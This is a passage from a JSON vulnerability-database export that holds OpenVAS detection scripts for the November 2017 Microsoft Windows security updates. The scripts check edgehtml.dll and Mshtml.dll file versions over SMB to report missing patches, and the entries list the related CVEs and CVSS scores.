file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.1231\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10586.0 - 11.0.10586.1231\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11845", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11874", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048954", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812089", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048954)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048954)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812089\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11768\", \"CVE-2017-11873\", \"CVE-2017-11874\",\n \"CVE-2017-11880\", \"CVE-2017-11788\", \"CVE-2017-11791\", \"CVE-2017-11803\",\n \"CVE-2017-11827\", \"CVE-2017-11830\", \"CVE-2017-11831\", \"CVE-2017-11833\",\n \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\", \"CVE-2017-11838\",\n \"CVE-2017-11844\", \"CVE-2017-11845\", \"CVE-2017-11846\", \"CVE-2017-11847\",\n \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\",\n \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\",\n \"CVE-2017-11861\", \"CVE-2017-11863\", \"CVE-2017-11866\", \"CVE-2017-11869\",\n \"CVE-2017-11870\", \"CVE-2017-11871\", \"CVE-2017-11872\");\n script_bugtraq_id(101735, 101734, 101719, 101740, 101705, 101728, 101750, 101755,\n 101711, 101715, 101704, 101703, 101714, 101721, 101706, 101725,\n 101727, 101722, 101737, 101707, 101708, 101741, 101729, 101709,\n 101762, 101738, 101763, 101764, 101751, 101753, 101716, 101723,\n 101748, 101732, 101742, 101731, 101730, 101749);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 08:37:02 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048954)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048954\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly initialize a memory address.\n\n - A security feature bypass when Device Guard incorrectly validates an untrusted\n file.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error when the Windows GDI component improperly discloses kernel memory\n addresses.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to potentially sensitive information, fake unsigned file appear\n to be signed, determine the origin of all web pages in the affected browser,\n gain the same user rights as the current user, cause a remote denial of service\n against a system, test for the presence of files on disk, force the browser to\n send data that would otherwise be restricted to a destination website of the\n attacker's choice and run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048954\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.725\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.725\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048956", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812082", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048956)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048956)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812082\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11768\", \"CVE-2017-11880\", \"CVE-2017-11788\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11830\", \"CVE-2017-11831\",\n \"CVE-2017-11833\", \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11846\", \"CVE-2017-11847\", \"CVE-2017-11848\",\n \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\", \"CVE-2017-11853\",\n \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\", \"CVE-2017-11863\",\n \"CVE-2017-11866\", \"CVE-2017-11869\");\n script_bugtraq_id(101735, 101734, 101719, 101740, 101705, 101755, 101711, 101715,\n 101703, 101714, 101721, 101706, 101725, 101727, 101722, 101737,\n 101741, 101729, 101709, 101762, 101738, 101763, 101764, 101751,\n 101753, 101716, 101748, 101732, 101742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 07:57:04 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048956)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048956\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly initialize a memory address.\n\n - A security feature bypass when Device Guard incorrectly validates an untrusted\n file.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error when the Windows GDI component improperly discloses kernel memory\n addresses.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the scripting engine does not properly handle objects in\n memory in Microsoft browsers.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error when Windows Media Player improperly discloses file information.\n\n - An error when Microsoft Edge improperly handles redirect requests.\n\n - An error when the Microsoft Windows Graphics Component improperly handles objects\n in memory.\n\n - An error when Internet Explorer improperly handles page content, which could\n allow an attacker to detect the navigation of the user leaving a maliciously\n crafted page.\n\n - An error in Microsoft Edge when the Edge Content Security Policy (CSP) fails to\n properly validate certain specially crafted documents.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to potentially sensitive information, fake unsigned file appear\n to be signed, determine the origin of all web pages in the affected browser,\n gain the same user rights as the current user, cause a remote denial of service\n against a system, test for the presence of files on disk, force the browser to\n send data that would otherwise be restricted to a destination website of the\n attacker's choice and run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for x64-based Systems\n\n - Microsoft Windows 10 for 32-bit Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048956\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17672\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17672\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11872", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048953", "modified": "2019-12-20T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812081", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048953)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048953)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812081\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11768\", \"CVE-2017-11880\", \"CVE-2017-11788\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11830\", \"CVE-2017-11831\",\n \"CVE-2017-11833\", \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11846\", \"CVE-2017-11847\", \"CVE-2017-11848\",\n \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\", \"CVE-2017-11853\",\n \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\", \"CVE-2017-11861\",\n \"CVE-2017-11863\", \"CVE-2017-11866\", \"CVE-2017-11869\", \"CVE-2017-11872\",\n \"CVE-2017-11873\");\n script_bugtraq_id(101735, 101734, 101719, 101740, 101705, 101755, 101711, 101715,\n 101703, 101714, 101721, 101706, 101725, 101727, 101722, 101737,\n 101741, 101729, 101709, 101762, 101738, 101763, 101764, 101751,\n 101753, 101716, 101723, 101748, 101732, 101742, 101749, 101728);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 07:36:54 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048953)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048953\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when the Windows kernel fails to properly initialize a memory address.\n\n - A security feature bypass when Device Guard incorrectly validates an untrusted\n file.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error when the Windows GDI component improperly discloses kernel memory\n addresses.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the scripting engine does not properly handle objects in\n memory in Microsoft browsers.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error when Windows Media Player improperly discloses file information.\n\n - An error when Microsoft Edge improperly handles redirect requests.\n\n - An error when the Microsoft Windows Graphics Component improperly handles objects\n in memory.\n\n - An error when Internet Explorer improperly handles page content, which could\n allow an attacker to detect the navigation of the user leaving a maliciously\n crafted page.\n\n - An error in Microsoft Edge when the Edge Content Security Policy (CSP) fails to\n properly validate certain specially crafted documents.\n\n - An error when the Windows kernel fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to potentially sensitive information, fake unsigned file appear\n to be signed, determine the origin of all web pages in the affected browser,\n gain the same user rights as the current user, cause a remote denial of service\n against a system, test for the presence of files on disk, force the browser to\n send data that would otherwise be restricted to a destination website of the\n attacker's choice and run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2016\n\n - Microsoft Windows 10 Version 1607 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048953\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2016:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1883\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.1883\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "description": "This host is missing a critical security\n update according to Microsoft KB4041693", "modified": "2019-12-20T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812207", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048958)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048958)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812207\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-11827\", \"CVE-2017-11831\", \"CVE-2017-11768\", \"CVE-2017-11788\",\n \"CVE-2017-11880\", \"CVE-2017-11791\", \"CVE-2017-11834\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11842\", \"CVE-2017-11843\", \"CVE-2017-11846\",\n \"CVE-2017-11847\", \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11850\",\n \"CVE-2017-11851\", \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\",\n \"CVE-2017-11858\", \"CVE-2017-11869\");\n script_bugtraq_id(101482);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 10:47:54 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048958)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041693\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Windows Media Player improperly discloses file information.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows kernel fails to properly initialize a memory address.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerabilities to obtain information to further\n compromise the user's system, cause a remote denial of service against a system\n and allow to test for the presence of files on disk.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048958\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.18838\"))\n{\n report = report_fixed_ver( file_checked:sysPath + \"\\Mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.18838\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768"], "description": "This host is missing an important security\n update according to Microsoft KB4048959", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812139", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812139", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4048959)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4048959)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812139\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11869\", \"CVE-2017-11768\", \"CVE-2017-11788\", \"CVE-2017-11880\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11834\", \"CVE-2017-11842\",\n \"CVE-2017-11843\", \"CVE-2017-11846\", \"CVE-2017-11847\", \"CVE-2017-11848\",\n \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\", \"CVE-2017-11853\",\n \"CVE-2017-11855\", \"CVE-2017-11858\", \"CVE-2017-11831\", \"CVE-2017-11832\");\n script_bugtraq_id(101742, 101705, 101711, 101755, 101715, 101703, 101725, 101719, 101740,\n 101741, 101729, 101709, 101762, 101738, 101763, 101764, 101751, 101716,\n 101721, 101726);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 10:19:08 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4048959)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4048959\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes improvements and\n fixes.\n\n - Addressed issue where the virtual smart card doesn't assess the Trusted Platform\n Module (TPM) vulnerability correctly.\n\n - Addressed issue where applications based on the Microsoft JET Database Engine\n fail when creating or opening Microsoft Excel .xls files.\");\n\n 